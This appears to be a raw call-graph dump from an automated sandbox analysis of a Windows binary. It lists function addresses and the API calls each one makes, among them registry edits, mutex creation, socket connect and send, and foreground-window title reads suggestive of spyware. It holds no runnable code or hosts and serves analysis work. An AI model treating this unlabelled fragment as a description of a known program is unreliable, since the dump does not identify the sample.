47562->47561 48925 4126db 38 API calls ___scrt_get_show_window_mode 47562->48925 47565 40f20c 47563->47565 47564->47531 48927 401be9 50 API calls _strftime 47564->48927 48088 40c162 7 API calls 47565->48088 47894 4134ff RegOpenKeyExA 47566->47894 47569 40f29c 47568->47569 48089 4052fd 28 API calls 47569->48089 47574 40f2ed 47576 41bc5e 28 API calls 47574->47576 47578 40f2fd 47576->47578 48090 41361b 31 API calls 47578->48090 47583 40f313 47584 401f09 11 API calls 47583->47584 47587 40f31e 47584->47587 47585 40f346 DeleteFileW 47586 40f34d 47585->47586 47585->47587 47586->47394 47587->47394 47587->47585 47588 40f334 Sleep 47587->47588 47588->47587 47589->47267 47590->47271 47591->47276 47592->47274 47593->47284 47594->47285 47595->47287 47596->47290 47597->47294 47598->47296 47603 44fb68 47599->47603 47602 438f5a 8 API calls 3 library calls 47602->47301 47604 44fb85 47603->47604 47607 44fb81 47603->47607 47604->47607 47609 449ca6 47604->47609 47606 4345bd 47606->47299 47606->47602 47621 434fcb 47607->47621 47610 449cb2 ___scrt_is_nonwritable_in_current_image 47609->47610 47628 445888 EnterCriticalSection 47610->47628 47612 449cb9 47629 450183 47612->47629 47614 449cc8 47615 449cd7 47614->47615 47640 449b3a 23 API calls 47614->47640 47642 449cf3 LeaveCriticalSection std::_Lockit::~_Lockit 47615->47642 47618 449cd2 47641 449bf0 GetStdHandle GetFileType 47618->47641 47619 449ce8 ___scrt_is_nonwritable_in_current_image 47619->47604 47622 434fd6 IsProcessorFeaturePresent 47621->47622 47623 434fd4 47621->47623 47625 435018 47622->47625 47623->47606 47670 434fdc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47625->47670 47627 4350fb 47627->47606 47628->47612 47630 45018f ___scrt_is_nonwritable_in_current_image 47629->47630 47631 4501b3 47630->47631 47632 45019c 47630->47632 47643 445888 EnterCriticalSection 47631->47643 47651 4405dd 20 API calls _Atexit 47632->47651 47635 4501eb 47652 450212 LeaveCriticalSection std::_Lockit::~_Lockit 47635->47652 47636 4501bf 47636->47635 47644 4500d4 47636->47644 47638 4501a1 ___scrt_is_nonwritable_in_current_image _Atexit 47638->47614 47640->47618 47641->47615 47642->47619 47643->47636 47653 445af3 47644->47653 47646 4500f3 47660 446782 47646->47660 47649 450145 47649->47636 47650 4500e6 47650->47646 47666 448a84 11 API calls 2 library calls 47650->47666 47651->47638 47652->47638 47658 445b00 ___crtLCMapStringA 47653->47658 47654 445b40 47668 4405dd 20 API calls _Atexit 47654->47668 47655 445b2b RtlAllocateHeap 47657 445b3e 47655->47657 47655->47658 47657->47650 47658->47654 47658->47655 47667 442f80 7 API calls 2 library calls 47658->47667 47661 44678d RtlFreeHeap 47660->47661 47662 4467b6 _free 47660->47662 47661->47662 47663 4467a2 47661->47663 47662->47649 47669 4405dd 20 API calls _Atexit 47663->47669 47665 4467a8 GetLastError 47665->47662 47666->47650 47667->47658 47668->47657 47669->47665 47670->47627 47672 434b27 GetStartupInfoW 47671->47672 47672->47305 47674 44f06b 47673->47674 47675 44f062 47673->47675 47674->47309 47678 44ef58 49 API calls 4 library calls 47675->47678 47677->47309 47678->47674 47680 41cb8f LoadLibraryA GetProcAddress 47679->47680 47681 41cb7f GetModuleHandleA GetProcAddress 47679->47681 47682 41cbb8 44 API calls 47680->47682 47683 41cba8 LoadLibraryA GetProcAddress 47680->47683 47681->47680 47682->47313 47683->47682 48093 41b4a8 FindResourceA 47684->48093 47688 40f3ed ctype 48103 4020b7 47688->48103 47691 401fe2 28 API calls 47692 40f413 47691->47692 47693 401fd8 11 API calls 47692->47693 47694 40f41c 47693->47694 47695 43bd51 new 21 API calls 47694->47695 47696 40f42d ctype 47695->47696 48109 406dd8 47696->48109 47698 40f460 47698->47315 47700 40210c 47699->47700 47701 4023ce 11 API calls 47700->47701 47702 402126 47701->47702 47703 402569 28 API calls 47702->47703 47704 402134 47703->47704 47704->47318 48163 4020df 47705->48163 47707 41be2e 47710 41bea0 47707->47710 47718 401fe2 28 API calls 47707->47718 47722 401fd8 11 API calls 47707->47722 47726 41be9e 47707->47726 48167 4041a2 47707->48167 48170 41ce34 47707->48170 47708 401fd8 11 API calls 47709 41bed0 47708->47709 47711 401fd8 11 API calls 47709->47711 47712 4041a2 28 API calls 47710->47712 47714 41bed8 47711->47714 47715 41beac 47712->47715 47716 401fd8 11 API calls 47714->47716 47717 401fe2 28 API calls 47715->47717 47719 40ea24 47716->47719 47720 41beb5 47717->47720 47718->47707 47727 40fb17 47719->47727 47721 401fd8 11 API calls 47720->47721 47723 41bebd 47721->47723 47722->47707 47724 41ce34 28 API calls 47723->47724 47724->47726 47726->47708 47728 40fb23 47727->47728 47730 40fb2a 47727->47730 48212 402163 11 API calls 47728->48212 47730->47323 47732 402163 47731->47732 47736 40219f 47732->47736 48213 402730 11 API calls 47732->48213 47734 402184 48214 402712 11 API calls std::_Deallocate 47734->48214 47736->47325 47738 401e6d 47737->47738 47739 401e75 47738->47739 48215 402158 22 API calls 47738->48215 47739->47330 47743 4020df 11 API calls 47742->47743 47744 40532a 47743->47744 48216 4032a0 47744->48216 47746 405346 47746->47338 48220 4051ef 47747->48220 47749 406391 48224 402055 47749->48224 47752 401fe2 47753 401ff1 47752->47753 47760 402039 47752->47760 47754 4023ce 11 API calls 47753->47754 47755 401ffa 47754->47755 47756 40203c 47755->47756 47758 402015 47755->47758 47757 40267a 11 API calls 47756->47757 47757->47760 48256 403098 28 API calls 47758->48256 47761 401fd8 47760->47761 47762 4023ce 11 API calls 47761->47762 47763 401fe1 47762->47763 47763->47350 47765 401fd2 47764->47765 47766 401fc9 47764->47766 47765->47356 48257 4025e0 28 API calls 47766->48257 48258 401fab 47768->48258 47770 40d073 CreateMutexA GetLastError 47770->47372 48259 41bfb7 47771->48259 47776 401fe2 28 API calls 47777 41b2ff 47776->47777 47778 401fd8 11 API calls 47777->47778 47779 41b307 47778->47779 47780 4135a6 31 API calls 47779->47780 47782 41b35d 47779->47782 47781 41b330 47780->47781 47783 41b33b StrToIntA 47781->47783 47782->47379 47784 41b349 47783->47784 47787 41b352 47783->47787 48267 41cf69 22 API calls 47784->48267 47786 401fd8 11 API calls 47786->47782 47787->47786 47789 40772a 47788->47789 47790 413549 3 API calls 47789->47790 47791 407731 47790->47791 47791->47389 47791->47390 47793 41bc72 47792->47793 48268 40b904 47793->48268 47795 41bc7a 47795->47406 47797 401f22 47796->47797 47798 401f6a 47796->47798 47799 402252 11 API calls 47797->47799 47805 401f09 47798->47805 47800 401f2b 47799->47800 47801 401f6d 47800->47801 47802 401f46 47800->47802 48301 402336 47801->48301 48300 40305c 28 API calls 47802->48300 47806 402252 11 API calls 47805->47806 47807 401f12 47806->47807 47807->47418 47809 413965 47808->47809 47810 406dd8 28 API calls 47809->47810 47811 41397a 47810->47811 47812 4020f6 28 API calls 47811->47812 47813 41398a 47812->47813 47814 41376f 14 API calls 47813->47814 47815 413994 47814->47815 47816 401fd8 11 API calls 47815->47816 47817 4139a1 47816->47817 47817->47467 47819 40209b 47818->47819 47820 4023ce 11 API calls 47819->47820 47821 4020a6 47820->47821 48305 4024ed 47821->48305 47825 4137bf 47824->47825 47828 413788 47824->47828 47826 401fd8 11 API calls 47825->47826 47827 40ef9e 47826->47827 47827->47469 47829 41379a RegSetValueExA RegCloseKey 47828->47829 47829->47825 47831 43bac5 _strftime 47830->47831 48309 43ae03 47831->48309 47833 40efb7 47833->47476 47833->47478 47835 41b5a0 47834->47835 47836 41b505 GetLocalTime 47834->47836 47838 401fd8 11 API calls 47835->47838 47837 40531e 28 API calls 47836->47837 47839 41b547 47837->47839 47840 41b5a8 47838->47840 47842 406383 28 API calls 47839->47842 47841 401fd8 11 API calls 47840->47841 47843 40f00d 47841->47843 47844 41b553 47842->47844 47843->47493 48337 402f10 47844->48337 47847 406383 28 API calls 47848 41b56b 47847->47848 48342 407200 77 API calls 47848->48342 47850 41b579 47851 401fd8 11 API calls 47850->47851 47852 41b585 47851->47852 47853 401fd8 11 API calls 47852->47853 47854 41b58e 47853->47854 47855 401fd8 11 API calls 47854->47855 47856 41b597 47855->47856 47857 401fd8 11 API calls 47856->47857 47857->47835 47859 409e02 _wcslen 47858->47859 47860 409e24 47859->47860 47861 409e0d 47859->47861 47863 40da34 31 API calls 47860->47863 47862 40da34 31 API calls 47861->47862 47864 409e15 47862->47864 47865 409e2c 47863->47865 47867 401f13 28 API calls 47864->47867 47866 401f13 28 API calls 47865->47866 47868 409e3a 47866->47868 47882 409e1f 47867->47882 47869 401f09 11 API calls 47868->47869 47870 409e42 47869->47870 48361 40915b 28 API calls 47870->48361 47871 401f09 11 API calls 47873 409e79 47871->47873 48346 40a109 47873->48346 47874 409e54 48362 403014 47874->48362 47879 401f13 28 API calls 47880 409e69 47879->47880 47881 401f09 11 API calls 47880->47881 47881->47882 47882->47871 48414 40417e 47883->48414 47888 403014 28 API calls 47889 41b672 47888->47889 47890 401f09 11 API calls 47889->47890 47891 41b67b 47890->47891 47892 401f09 11 API calls 47891->47892 47893 40f223 47892->47893 47893->47546 47895 413520 RegQueryValueExA RegCloseKey 47894->47895 47896 40f2e4 47894->47896 47895->47896 47896->47419 47896->47574 47898 40f392 47897->47898 47899 413a3f RegDeleteValueW 47897->47899 47898->47412 47899->47898 47901 40dd5b 47900->47901 47902 4134ff 3 API calls 47901->47902 47903 40dd62 47902->47903 47907 40dd81 47903->47907 48506 401707 47903->48506 47905 40dd6f 48509 413877 RegCreateKeyA 47905->48509 47908 414f2a 47907->47908 47909 4020df 11 API calls 47908->47909 47910 414f3e 47909->47910 48523 41b8b3 47910->48523 47913 4020df 11 API calls 47914 414f54 47913->47914 47915 401e65 22 API calls 47914->47915 47916 414f62 47915->47916 47917 43baac _strftime 40 API calls 47916->47917 47918 414f6f 47917->47918 47919 414f81 47918->47919 47920 414f74 Sleep 47918->47920 47921 402093 28 API calls 47919->47921 47920->47919 47922 414f90 47921->47922 47923 401e65 22 API calls 47922->47923 47924 414f99 47923->47924 47925 4020f6 28 API calls 47924->47925 47926 414fa4 47925->47926 47927 41be1b 28 API calls 47926->47927 47928 414fac 47927->47928 48527 40489e WSAStartup 47928->48527 47930 414fb6 47931 401e65 22 API calls 47930->47931 47932 414fbf 47931->47932 47933 401e65 22 API calls 47932->47933 47993 41503e 47932->47993 47934 414fd8 47933->47934 47935 401e65 22 API calls 47934->47935 47936 414fe9 47935->47936 47938 401e65 22 API calls 47936->47938 47937 41be1b 28 API calls 47937->47993 47940 414ffa 47938->47940 47939 401e65 22 API calls 47939->47993 47942 401e65 22 API calls 47940->47942 47941 406c1e 28 API calls 47941->47993 47943 41500b 47942->47943 47945 401e65 22 API calls 47943->47945 47944 401fe2 28 API calls 47944->47993 47946 41501c 47945->47946 47947 401e65 22 API calls 47946->47947 47948 41502e 47947->47948 48688 40473d 89 API calls 47948->48688 47950 402093 28 API calls 47950->47993 47951 41b4ef 80 API calls 47951->47993 47953 41518c WSAGetLastError 48689 41cae1 30 API calls 47953->48689 47958 41519c 47960 41b4ef 80 API calls 47958->47960 47963 401e65 22 API calls 47958->47963 47964 401e8d 11 API calls 47958->47964 47965 43baac _strftime 40 API calls 47958->47965 47958->47993 47995 402093 28 API calls 47958->47995 47996 415a71 CreateThread 47958->47996 47997 401fd8 11 API calls 47958->47997 47998 401f09 11 API calls 47958->47998 48690 4052fd 28 API calls 47958->48690 48691 40b051 85 API calls 47958->48691 48692 404e26 99 API calls 47958->48692 47960->47958 47962 40531e 28 API calls 47962->47993 47963->47958 47964->47958 47967 415acf Sleep 47965->47967 47966 406383 28 API calls 47966->47993 47967->47958 47970 40905c 28 API calls 47970->47993 47972 4020f6 28 API calls 47972->47993 47973 4136f8 3 API calls 47973->47993 47974 4135a6 31 API calls 47974->47993 47975 40417e 28 API calls 47975->47993 47978 401e65 22 API calls 47979 415439 GetTickCount 47978->47979 48635 41bb8e 47979->48635 47982 41bb8e 28 API calls 47982->47993 47984 41bd1e 28 API calls 47984->47993 47987 402f10 28 API calls 47987->47993 47988 402ea1 28 API calls 47988->47993 47990 401fd8 11 API calls 47990->47993 47991 401f09 11 API calls 47991->47993 47993->47937 47993->47939 47993->47941 47993->47944 47993->47950 47993->47951 47993->47953 47993->47958 47993->47962 47993->47966 47993->47970 47993->47972 47993->47973 47993->47974 47993->47975 47993->47978 47993->47982 47993->47984 47993->47987 47993->47988 47993->47990 47993->47991 48528 414ee9 47993->48528 48534 40482d 47993->48534 48541 404f51 47993->48541 48556 4048c8 connect 47993->48556 48616 41b7e0 47993->48616 48619 4145bd 47993->48619 48622 441e81 47993->48622 48626 40dd89 47993->48626 48632 41bc42 47993->48632 48640 41bae6 47993->48640 48642 41ba96 47993->48642 48647 40f8d1 GetLocaleInfoA 47993->48647 48650 402f31 47993->48650 48655 404aa1 47993->48655 48670 404c10 47993->48670 47995->47958 47996->47958 48882 41ad17 105 API calls 47996->48882 47997->47958 47998->47958 47999->47331 48000->47339 48001->47343 48004 4020df 11 API calls 48003->48004 48005 406c2a 48004->48005 48006 4032a0 28 API calls 48005->48006 48007 406c47 48006->48007 48007->47364 48009 40eba4 48008->48009 48010 413573 RegQueryValueExA RegCloseKey 48008->48010 48009->47361 48009->47378 48010->48009 48011->47367 48012->47397 48013->47390 48014->47382 48015->47395 48883 401f86 48016->48883 48019 40da70 48887 41b5b4 29 API calls 48019->48887 48020 40daa5 48024 41bfb7 GetCurrentProcess 48020->48024 48022 40da66 48023 40db99 GetLongPathNameW 48022->48023 48026 40417e 28 API calls 48023->48026 48027 40daaa 48024->48027 48025 40da79 48028 401f13 28 API calls 48025->48028 48029 40dbae 48026->48029 48030 40db00 48027->48030 48031 40daae 48027->48031 48032 40da83 48028->48032 48033 40417e 28 API calls 48029->48033 48034 40417e 28 API calls 48030->48034 48035 40417e 28 API calls 48031->48035 48039 401f09 11 API calls 48032->48039 48036 40dbbd 48033->48036 48037 40db0e 48034->48037 48038 40dabc 48035->48038 48890 40ddd1 28 API calls 48036->48890 48042 40417e 28 API calls 48037->48042 48043 40417e 28 API calls 48038->48043 48039->48022 48041 40dbd0 48891 402fa5 28 API calls 48041->48891 48045 40db24 48042->48045 48046 40dad2 48043->48046 48889 402fa5 28 API calls 48045->48889 48888 402fa5 28 API calls 48046->48888 48047 40dbdb 48892 402fa5 28 API calls 48047->48892 48051 40dbe5 48054 401f09 11 API calls 48051->48054 48052 40db2f 48055 401f13 28 API calls 48052->48055 48053 40dadd 48056 401f13 28 API calls 48053->48056 48057 40dbef 48054->48057 48058 40db3a 48055->48058 48059 40dae8 48056->48059 48060 401f09 11 API calls 48057->48060 48061 401f09 11 API calls 48058->48061 48062 401f09 11 API calls 48059->48062 48063 40dbf8 48060->48063 48064 40db43 48061->48064 48065 40daf1 48062->48065 48066 401f09 11 API calls 48063->48066 48067 401f09 11 API calls 48064->48067 48068 401f09 11 API calls 48065->48068 48069 40dc01 48066->48069 48067->48032 48068->48032 48070 401f09 11 API calls 48069->48070 48071 40dc0a 48070->48071 48072 401f09 11 API calls 48071->48072 48073 40dc13 48072->48073 48073->47454 48074->47468 48075->47489 48077 41371e RegQueryValueExA RegCloseKey 48076->48077 48078 413742 48076->48078 48077->48078 48078->47447 48079->47483 48084 4344ef 48080->48084 48081 43bd51 new 21 API calls 48081->48084 48082 40f0d1 48082->47520 48084->48081 48084->48082 48893 442f80 7 API calls 2 library calls 48084->48893 48894 434c35 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 48084->48894 48895 43526e RaiseException Concurrency::cancel_current_task __CxxThrowException@8 48084->48895 48087->47551 48088->47539 48090->47583 48091->47388 48094 41b4c5 LoadResource LockResource SizeofResource 48093->48094 48095 40f3de 48093->48095 48094->48095 48096 43bd51 48095->48096 48101 446137 ___crtLCMapStringA 48096->48101 48097 446175 48113 4405dd 20 API calls _Atexit 48097->48113 48098 446160 RtlAllocateHeap 48100 446173 48098->48100 48098->48101 48100->47688 48101->48097 48101->48098 48112 442f80 7 API calls 2 library calls 48101->48112 48104 4020bf 48103->48104 48114 4023ce 48104->48114 48106 4020ca 48118 40250a 48106->48118 48108 4020d9 48108->47691 48110 4020b7 28 API calls 48109->48110 48111 406dec 48110->48111 48111->47698 48112->48101 48113->48100 48115 402428 48114->48115 48116 4023d8 48114->48116 48115->48106 48116->48115 48125 4027a7 11 API calls std::_Deallocate 48116->48125 48119 40251a 48118->48119 48120 402520 48119->48120 48121 402535 48119->48121 48126 402569 48120->48126 48136 4028e8 48121->48136 48124 402533 48124->48108 48125->48115 48147 402888 48126->48147 48128 40257d 48129 402592 48128->48129 48130 4025a7 48128->48130 48152 402a34 22 API calls 48129->48152 48132 4028e8 28 API calls 48130->48132 48135 4025a5 48132->48135 48133 40259b 48153 4029da 22 API calls 48133->48153 48135->48124 48137 4028f1 48136->48137 48138 402953 48137->48138 48139 4028fb 48137->48139 48161 4028a4 22 API calls 48138->48161 48142 402904 48139->48142 48143 402917 48139->48143 48155 402cae 48142->48155 48144 402915 48143->48144 48146 4023ce 11 API calls 48143->48146 48144->48124 48146->48144 48148 402890 48147->48148 48149 402898 48148->48149 48154 402ca3 22 API calls 48148->48154 48149->48128 48152->48133 48153->48135 48156 402cb8 __EH_prolog 48155->48156 48162 402e54 22 API calls 48156->48162 48158 4023ce 11 API calls 48160 402d92 48158->48160 48159 402d24 48159->48158 48160->48144 48162->48159 48164 4020e7 48163->48164 48165 4023ce 11 API calls 48164->48165 48166 4020f2 48165->48166 48166->47707 48181 40423a 48167->48181 48171 41ce41 48170->48171 48172 41cea0 48171->48172 48176 41ce51 48171->48176 48173 41ceba 48172->48173 48174 41cfe0 28 API calls 48172->48174 48196 41d146 28 API calls 48173->48196 48174->48173 48177 41ce89 48176->48177 48187 41cfe0 48176->48187 48195 41d146 28 API calls 48177->48195 48178 41ce9c 48178->47707 48182 404243 48181->48182 48183 4023ce 11 API calls 48182->48183 48184 40424e 48183->48184 48185 402569 28 API calls 48184->48185 48186 4041b5 48185->48186 48186->47707 48189 41cfe8 48187->48189 48188 41d01a 48188->48177 48189->48188 48190 41d01e 48189->48190 48193 41d002 48189->48193 48207 402725 22 API calls 48190->48207 48197 41d051 48193->48197 48195->48178 48196->48178 48198 41d05b __EH_prolog 48197->48198 48208 402717 22 API calls 48198->48208 48200 41d06e 48209 41d15d 11 API calls 48200->48209 48202 41d094 48203 41d0cc 48202->48203 48210 402730 11 API calls 48202->48210 48203->48188 48205 41d0b3 48211 402712 11 API calls std::_Deallocate 48205->48211 48208->48200 48209->48202 48210->48205 48211->48203 48212->47730 48213->47734 48214->47736 48218 4032aa 48216->48218 48217 4032c9 48217->47746 48218->48217 48219 4028e8 28 API calls 48218->48219 48219->48217 48221 4051fb 48220->48221 48230 405274 48221->48230 48223 405208 48223->47749 48225 402061 48224->48225 48226 4023ce 11 API calls 48225->48226 48227 40207b 48226->48227 48252 40267a 48227->48252 48231 405282 48230->48231 48232 405288 48231->48232 48233 40529e 48231->48233 48241 4025f0 48232->48241 48235 4052f5 48233->48235 48236 4052b6 48233->48236 48250 4028a4 22 API calls 48235->48250 48239 4028e8 28 API calls 48236->48239 48240 40529c 48236->48240 48239->48240 48240->48223 48242 402888 22 API calls 48241->48242 48243 402602 48242->48243 48244 402672 48243->48244 48246 402629 48243->48246 48251 4028a4 22 API calls 48244->48251 48248 4028e8 28 API calls 48246->48248 48249 40263b 48246->48249 48248->48249 48249->48240 48253 40268b 48252->48253 48254 4023ce 11 API calls 48253->48254 48255 40208d 48254->48255 48255->47752 48256->47760 48257->47765 48260 41bfc4 GetCurrentProcess 48259->48260 48261 41b2d1 48259->48261 48260->48261 48262 4135a6 RegOpenKeyExA 48261->48262 48263 4135d4 RegQueryValueExA RegCloseKey 48262->48263 48264 4135fe 48262->48264 48263->48264 48265 402093 28 API calls 48264->48265 48266 413613 48265->48266 48266->47776 48267->47787 48269 40b90c 48268->48269 48274 402252 48269->48274 48271 40b917 48278 40b92c 48271->48278 48273 40b926 48273->47795 48275 40225c 48274->48275 48276 4022ac 48274->48276 48275->48276 48285 402779 11 API calls std::_Deallocate 48275->48285 48276->48271 48279 40b966 48278->48279 48280 40b938 48278->48280 48297 4028a4 22 API calls 48279->48297 48286 4027e6 48280->48286 48284 40b942 48284->48273 48285->48276 48287 4027ef 48286->48287 48288 402851 48287->48288 48289 4027f9 48287->48289 48299 4028a4 22 API calls 48288->48299 48292 402802 48289->48292 48294 402815 48289->48294 48298 402aea 28 API calls __EH_prolog 48292->48298 48293 402813 48293->48284 48294->48293 48296 402252 11 API calls 48294->48296 48296->48293 48298->48293 48300->47798 48302 402347 48301->48302 48303 402252 11 API calls 48302->48303 48304 4023c7 48303->48304 48304->47798 48306 4024f9 48305->48306 48307 40250a 28 API calls 48306->48307 48308 4020b1 48307->48308 48308->47461 48325 43ba0a 48309->48325 48311 43ae50 48331 43a7b7 36 API calls 3 library calls 48311->48331 48313 43ae15 48313->48311 48314 43ae2a 48313->48314 48324 43ae2f _Atexit 48313->48324 48330 4405dd 20 API calls _Atexit 48314->48330 48317 43ae5c 48318 43ae8b 48317->48318 48332 43ba4f 40 API calls __Tolower 48317->48332 48321 43aef7 48318->48321 48333 43b9b6 20 API calls 2 library calls 48318->48333 48334 43b9b6 20 API calls 2 library calls 48321->48334 48322 43afbe _strftime 48322->48324 48335 4405dd 20 API calls _Atexit 48322->48335 48324->47833 48326 43ba22 48325->48326 48327 43ba0f 48325->48327 48326->48313 48336 4405dd 20 API calls _Atexit 48327->48336 48329 43ba14 _Atexit 48329->48313 48330->48324 48331->48317 48332->48317 48333->48321 48334->48322 48335->48324 48336->48329 48343 401fb0 48337->48343 48339 402f1e 48340 402055 11 API calls 48339->48340 48341 402f2d 48340->48341 48341->47847 48342->47850 48344 4025f0 28 API calls 48343->48344 48345 401fbd 48344->48345 48345->48339 48347 40a127 48346->48347 48348 413549 3 API calls 48347->48348 48349 40a12e 48348->48349 48350 40a142 48349->48350 48351 40a15c 48349->48351 48352 409e9b 48350->48352 48353 40a147 48350->48353 48354 40905c 28 API calls 48351->48354 48352->47512 48367 40905c 48353->48367 48356 40a16a 48354->48356 48374 40a179 86 API calls 48356->48374 48360 40a15a 48360->48352 48361->47874 48391 403222 48362->48391 48364 403022 48395 403262 48364->48395 48368 409072 48367->48368 48369 402252 11 API calls 48368->48369 48370 40908c 48369->48370 48375 404267 48370->48375 48372 40909a 48373 40a22d 29 API calls 48372->48373 48373->48360 48387 40a273 163 API calls 48373->48387 48374->48352 48388 40a267 86 API calls 48374->48388 48389 40a289 48 API calls 48374->48389 48390 40a27d 128 API calls 48374->48390 48376 402888 22 API calls 48375->48376 48377 40427b 48376->48377 48378 404290 48377->48378 48379 4042a5 48377->48379 48385 4042df 22 API calls 48378->48385 48381 4027e6 28 API calls 48379->48381 48384 4042a3 48381->48384 48382 404299 48386 402c48 22 API calls 48382->48386 48384->48372 48385->48382 48386->48384 48392 40322e 48391->48392 48401 403618 48392->48401 48394 40323b 48394->48364 48396 40326e 48395->48396 48397 402252 11 API calls 48396->48397 48398 403288 48397->48398 48399 402336 11 API calls 48398->48399 48400 403031 48399->48400 48400->47879 48402 403626 48401->48402 48403 403644 48402->48403 48404 40362c 48402->48404 48406 40365c 48403->48406 48407 40369e 48403->48407 48412 4036a6 28 API calls 48404->48412 48410 4027e6 28 API calls 48406->48410 48411 403642 48406->48411 48413 4028a4 22 API calls 48407->48413 48410->48411 48411->48394 48412->48411 48415 404186 48414->48415 48416 402252 11 API calls 48415->48416 48417 404191 48416->48417 48425 4041bc 48417->48425 48420 4042fc 48436 404353 48420->48436 48422 40430a 48423 403262 11 API calls 48422->48423 48424 404319 48423->48424 48424->47888 48426 4041c8 48425->48426 48429 4041d9 48426->48429 48428 40419c 48428->48420 48430 4041e9 48429->48430 48431 404206 48430->48431 48432 4041ef 48430->48432 48433 4027e6 28 API calls 48431->48433 48434 404267 28 API calls 48432->48434 48435 404204 48433->48435 48434->48435 48435->48428 48437 40435f 48436->48437 48440 404371 48437->48440 48439 40436d 48439->48422 48441 40437f 48440->48441 48442 404385 48441->48442 48443 40439e 48441->48443 48504 4034e6 28 API calls 48442->48504 48444 402888 22 API calls 48443->48444 48445 4043a6 48444->48445 48447 404419 48445->48447 48448 4043bf 48445->48448 48505 4028a4 22 API calls 48447->48505 48450 4027e6 28 API calls 48448->48450 48459 40439c 48448->48459 48450->48459 48459->48439 48504->48459 48512 43aa9a 48506->48512 48510 41388f RegSetValueExA RegCloseKey 48509->48510 48511 4138b9 48509->48511 48510->48511 48511->47907 48515 43aa1b 48512->48515 48514 40170d 48514->47905 48516 43aa2a 48515->48516 48517 43aa3e 48515->48517 48521 4405dd 20 API calls _Atexit 48516->48521 48520 43aa2f __alldvrm _Atexit 48517->48520 48522 448957 11 API calls 2 library calls 48517->48522 48520->48514 48521->48520 48522->48520 48526 41b8f9 ctype ___scrt_get_show_window_mode 48523->48526 48524 402093 28 API calls 48525 414f49 48524->48525 48525->47913 48526->48524 48527->47930 48529 414f02 WSASetLastError 48528->48529 48530 414ef8 48528->48530 48529->47993 48693 414d86 29 API calls ___std_exception_copy 48530->48693 48532 414efd 48532->48529 48535 404846 socket 48534->48535 48536 404839 48534->48536 48538 404860 CreateEventW 48535->48538 48539 404842 48535->48539 48694 40489e WSAStartup 48536->48694 48538->47993 48539->47993 48540 40483e 48540->48535 48540->48539 48542 404fea 48541->48542 48543 404f65 48541->48543 48542->47993 48544 404f6e 48543->48544 48545 404fc0 CreateEventA CreateThread 48543->48545 48546 404f7d GetLocalTime 48543->48546 48544->48545 48545->48542 48696 405150 48545->48696 48547 41bb8e 28 API calls 48546->48547 48548 404f91 48547->48548 48695 4052fd 28 API calls 48548->48695 48557 404a1b 48556->48557 48558 4048ee 48556->48558 48559 40497e 48557->48559 48560 404a21 WSAGetLastError 48557->48560 48558->48559 48561 404923 48558->48561 48564 40531e 28 API calls 48558->48564 48559->47993 48560->48559 48562 404a31 48560->48562 48700 420c60 27 API calls 48561->48700 48565 404932 48562->48565 48566 404a36 48562->48566 48568 40490f 48564->48568 48572 402093 28 API calls 48565->48572 48705 41cae1 30 API calls 48566->48705 48567 40492b 48567->48565 48571 404941 48567->48571 48573 402093 28 API calls 48568->48573 48570 404a40 48706 4052fd 28 API calls 48570->48706 48581 404950 48571->48581 48582 404987 48571->48582 48575 404a80 48572->48575 48576 40491e 48573->48576 48579 402093 28 API calls 48575->48579 48577 41b4ef 80 API calls 48576->48577 48577->48561 48583 404a8f 48579->48583 48586 402093 28 API calls 48581->48586 48702 421a40 54 API calls 48582->48702 48587 41b4ef 80 API calls 48583->48587 48590 40495f 48586->48590 48587->48559 48589 40498f 48592 4049c4 48589->48592 48593 404994 48589->48593 48594 402093 28 API calls 48590->48594 48704 420e06 28 API calls 48592->48704 48597 402093 28 API calls 48593->48597 48598 40496e 48594->48598 48600 4049a3 48597->48600 48601 41b4ef 80 API calls 48598->48601 48599 4049cc 48602 4049f9 CreateEventW CreateEventW 48599->48602 48605 402093 28 API calls 48599->48605 48603 402093 28 API calls 48600->48603 48604 404973 48601->48604 48602->48559 48606 4049b2 48603->48606 48701 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48604->48701 48608 4049e2 48605->48608 48609 41b4ef 80 API calls 48606->48609 48610 402093 28 API calls 48608->48610 48611 4049b7 48609->48611 48612 4049f1 48610->48612 48703 4210b2 52 API calls 48611->48703 48614 41b4ef 80 API calls 48612->48614 48615 4049f6 48614->48615 48615->48602 48707 41b7b6 GlobalMemoryStatusEx 48616->48707 48618 41b7f5 48618->47993 48708 414580 48619->48708 48623 441e8d 48622->48623 48738 441c7d 48623->48738 48625 441eae 48625->47993 48627 40dda5 48626->48627 48628 4134ff 3 API calls 48627->48628 48630 40ddac 48628->48630 48629 40ddc4 48629->47993 48630->48629 48631 413549 3 API calls 48630->48631 48631->48629 48633 4020b7 28 API calls 48632->48633 48634 41bc57 48633->48634 48634->47993 48636 441e81 20 API calls 48635->48636 48637 41bbb2 48636->48637 48638 402093 28 API calls 48637->48638 48639 41bbc0 48638->48639 48639->47993 48641 41bafc GetTickCount 48640->48641 48641->47993 48643 436e90 ___scrt_get_show_window_mode 48642->48643 48644 41bab5 GetForegroundWindow GetWindowTextW 48643->48644 48645 40417e 28 API calls 48644->48645 48646 41badf 48645->48646 48646->47993 48648 402093 28 API calls 48647->48648 48649 40f8f6 48648->48649 48649->47993 48651 4020df 11 API calls 48650->48651 48652 402f3d 48651->48652 48653 4032a0 28 API calls 48652->48653 48654 402f59 48653->48654 48654->47993 48656 404ab4 48655->48656 48743 40520c 48656->48743 48658 404ac9 ctype 48659 404b40 WaitForSingleObject 48658->48659 48660 404b20 48658->48660 48662 404b56 48659->48662 48661 404b32 send 48660->48661 48663 404b7b 48661->48663 48749 42103a 54 API calls 48662->48749 48666 401fd8 11 API calls 48663->48666 48665 404b69 SetEvent 48665->48663 48667 404b83 48666->48667 48668 401fd8 11 API calls 48667->48668 48669 404b8b 48668->48669 48669->47993 48671 4020df 11 API calls 48670->48671 48672 404c27 48671->48672 48673 4020df 11 API calls 48672->48673 48676 404c30 48673->48676 48674 43bd51 new 21 API calls 48674->48676 48676->48674 48677 4020b7 28 API calls 48676->48677 48678 404ca1 48676->48678 48679 401fe2 28 API calls 48676->48679 48682 401fd8 11 API calls 48676->48682 48767 404b96 48676->48767 48773 404cc3 48676->48773 48677->48676 48785 404e26 99 API calls 48678->48785 48679->48676 48681 404ca8 48683 401fd8 11 API calls 48681->48683 48682->48676 48684 404cb1 48683->48684 48685 401fd8 11 API calls 48684->48685 48686 404cba 48685->48686 48686->47993 48688->47993 48689->47958 48691->47958 48692->47958 48693->48532 48694->48540 48699 40515c 102 API calls 